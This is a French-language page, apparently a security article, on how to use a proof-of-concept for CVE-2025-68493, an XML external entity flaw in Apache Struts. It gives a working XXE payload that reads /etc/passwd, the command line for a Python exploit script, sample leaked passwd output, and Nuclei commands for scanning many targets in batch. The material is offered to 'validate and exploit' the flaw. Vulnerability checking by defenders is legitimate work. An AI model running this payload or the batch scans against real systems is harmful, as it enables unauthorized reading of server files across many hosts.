
CVE-2025-68493
CVE-2025-68493
[1] ApacheStrutsXWorkXML漏洞CVE-2025-68493poc及脚本 | ZONE.CI 全球网. https://zone.ci/secarticles/wx/486533.html
Pour valider et exploiter la vulnérabilité CVE-2025-68493, les scripts PoC Python et les modèles Nuclei YAML suivants peuvent être utilisés.
Nom du script : cve_2025_68493_poc.py
Fonction : Ce script permet de valider la vulnérabilité sur une cible unique, en tentant de lire un fichier spécifique (par défaut /etc/passwd).
Prérequis :
requests (pip install requests)Paramètres en ligne de commande :
-u, --url : URL de base de l'application cible (exemple : http://127.0.0.1:8080)-f, --file : Chemin du fichier cible à lire (par défaut /etc/passwd)Exemple :
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd
Sortie attendue :
Si la cible est vulnérable et que le fichier est lu avec succès, le résultat ressemblera à ceci :
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------
Nom du modèle : cve-2025-68493.yaml
Fonction : Ce modèle permet de scanner plusieurs cibles en lot avec l'outil Nuclei afin de détecter la vulnérabilité CVE-2025-68493.
Prérequis :
Paramètres en ligne de commande :
-t : Chemin du fichier de modèle Nuclei-u : URL d'une cible unique-l : Fichier contenant plusieurs URL cibles (une par ligne)Exemple :
Scan d'une cible unique :
nuclei -t cve-2025-68493.yaml -u http://example.com:8080
Scan en lot :
Supposons que vous ayez un fichier nommé targets.txt contenant une URL cible par ligne :
http://target1.com:8080
http://target2.com:8080
Exécutez la commande suivante pour un scan en lot :
nuclei -t cve-2025-68493.yaml -l targets.txt